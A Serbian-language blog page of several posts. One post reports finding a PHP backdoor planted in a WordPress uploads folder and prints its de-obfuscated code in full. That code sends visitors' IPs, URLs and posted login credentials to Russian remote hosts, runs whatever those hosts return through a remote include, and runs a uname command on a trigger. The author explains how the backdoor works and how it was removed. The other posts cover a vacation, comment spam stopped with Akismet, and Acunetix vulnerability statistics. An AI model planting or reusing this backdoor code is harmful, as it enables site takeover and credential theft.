Planeta Srbija

Upadnem malopre sasvim slučajno u svoj wp-contents/uploads/ folder, kad ima šta i da vidim tamo: Dva PHP fajla, jedan base.php i jedan create.php, kao i jedan .htaccess fajl koji usmerava sve 404 greške na create.php. Budem radoznao, otvorim ih kad ono “obfuscated” kod, odnosno nije toliko obfuscated koliko je sve napisano u jednom redu. Ne budem lenj, otvorim ih preko PHPEdit-a koji sam dobio ranije (i za koji sam još uvek dužan da napišem review), odradim ctrl+shift+f (code beautifier) i dobijem lepo ispisan kod:

base.php

error_reporting(0); if (isset($_POST["l"]) and isset($_POST["p"])) {         if (isset($_POST["input"])) {                 $user_auth = "&l=" . base64_encode($_POST["l"]) . "&p=" . base64_encode(md5($_POST["p"]));         } else {                 $user_auth = "&l=" . $_POST["l"] . "&p=" . $_POST["p"];         } } else {         $user_auth = ""; } if (!isset($_POST["log_flg"])) {         $log_flg = "&log"; } if (!@include_once(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLmJpc2hlbGwucnU=") . "/?r_addr=" . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) . "&url=" . base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) {         if ($_POST["l"] == "special") {                 print "sys_active" . `uname -a`;         } }

create.php

error_reporting(0); $s = "e"; $a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF); $e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING); $f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".$s"; if ((include(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLnBocGZyZWUucnU=") . "/?" . $str))) { } else {         include(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLnBocGNvZGluZy5ydQ==") . "/?" . $str); }

Sve ovo što je base64_decode echo-ujem i vidim da je skripta napravljena da cross-site inkluduje u ovu skriptu štagod joj se prosledi sa http://hegfzzazbzbcd.users.phpfree.ru/, odnosno sa  http://hegfzzazbzbcd.users.phpcoding.ru ako ne uspe sa ove prve adrese - klasičan backdoor. Nemam pojma od kad to stoji na blogu, niti imam pojma otkud to kod mene u uploads/ folderu, i čudim se kako do sad bRlog nije deface-ovan, ali sad i da hoće neko preko toga da ga deface-uje - ne može, jer sam izbrisao skripte, i sprečio izvršavanje php skripti u uploads/ folderu.

A sad me izvin’te, odoh da proverim ostale blogove, što savetujem i vama.

Nije me bilo neko vreme… došao sam sa mora, nisam, naravno, pocrneo, jer ne volim sunčanje, i tako to… u principu me mrzi da sad prepričavam neke događaje, a par fotki imate kod mene na MySpace-u, pa ih možete videti tamo. Sve u svemu, bilo je lepo, nisam imao nikakvih problema u CG, obišao sam sve od Herceg Novog do Ade Bojane i super se proveo.

Međutim, kad sam se vratio zatekao sam preko 2000 SPAM komentara na InterestingFacts.org. Očigledno je ona CAPTCHA beskorisna (a kako i ne bi bila kad nema nikakvog deformisanja slike?)… note to myself - izbaci kepču. Nije mi bio problem da uklonim te spam komentare jer su se prilično šablonski pojavljivali, tako da sam sa pet-šest MySQL kverija očistio bazu od spama. Ali, problem je predstavljalo to što se spam botovi nikako nisu zaustavljali. Za dva dana sam skupljao po 2000 spam komentara. Poslednji talas je bio večeras kad sam par minuta posle čišćenja baze video desetak novih spam komentara u bazi. No, setih se Akismet-a kojim sam zaštitio ovaj i sve ostale blogove koje održavam, nađoh neku gotovu PHP klasu za Akismet i eto, od ovog jutra Akismet čuva Interesting Facts. Testirao sam ga sa normalnim komentarom i jednim “buy cheap viagra” komentarom, i pokazao se kao prilično uspešan. Takođe, nisam se mnogo trudio oko implementacije zaštite tako da se sumnjivi komentari ne zadržavaju za moderaciju već se odmah odbacuju. Ako budem saznao da dosta greši (mada po iskustvima sa Wordpress-om - ne greši dosta) uvešću i tako nešto, no neću sada o tome.

Inače, danas sam prijavio tri ispita za septembarski rok i nadam se da ću naći vremena da ih spremim, ali kako je Instant Update 3 u završnoj fazi izrade (tačnije gotov je, treba ga samo spakovati za release)  a i Beer Fest nam se približava - teško.

Prema nekim rezultatima Acunetix-a 70% svih sajtova koji su oni skenirali su podložni hakerskim upadima. U proseku 91% ovih web sajtova imaju neki propust, od onih ozbiljnijih poput SQL Injection i Cross Site Scripting do manje opasnih kao što je otvoreni listing direktorijuma i slično.

Od totalnih 210 000 propusta skeniranih sajtova, nađeno je oko 66 propusta po web sajtu, što je veoma alarmantna činjenica, izgleda da se danas sve manje pažnje obraća ka bezbednosti web aplikacija. Ali i taj broj koji je objavljen deluje malo, ako u nekoj aplikaciji nije nađen nijedan propust ne znači da taj web sajt siguran.

Da, možda je malo ironično da kompanija koja profitira od (ne)sigurnosti web sajtova objavljuje takve rezultate, ali još je sarkastičnije (postoji li ova reč?) je što je ista ta kompanija je bila podložna XSS napadu. Acunetix je sve sajtove automatski skenirao za poznate propuste, što znači da bi broj bio još mnogo veći da je to sve rađeno ručno, sigurnost na internetu ? hmm... ne bih rek'o.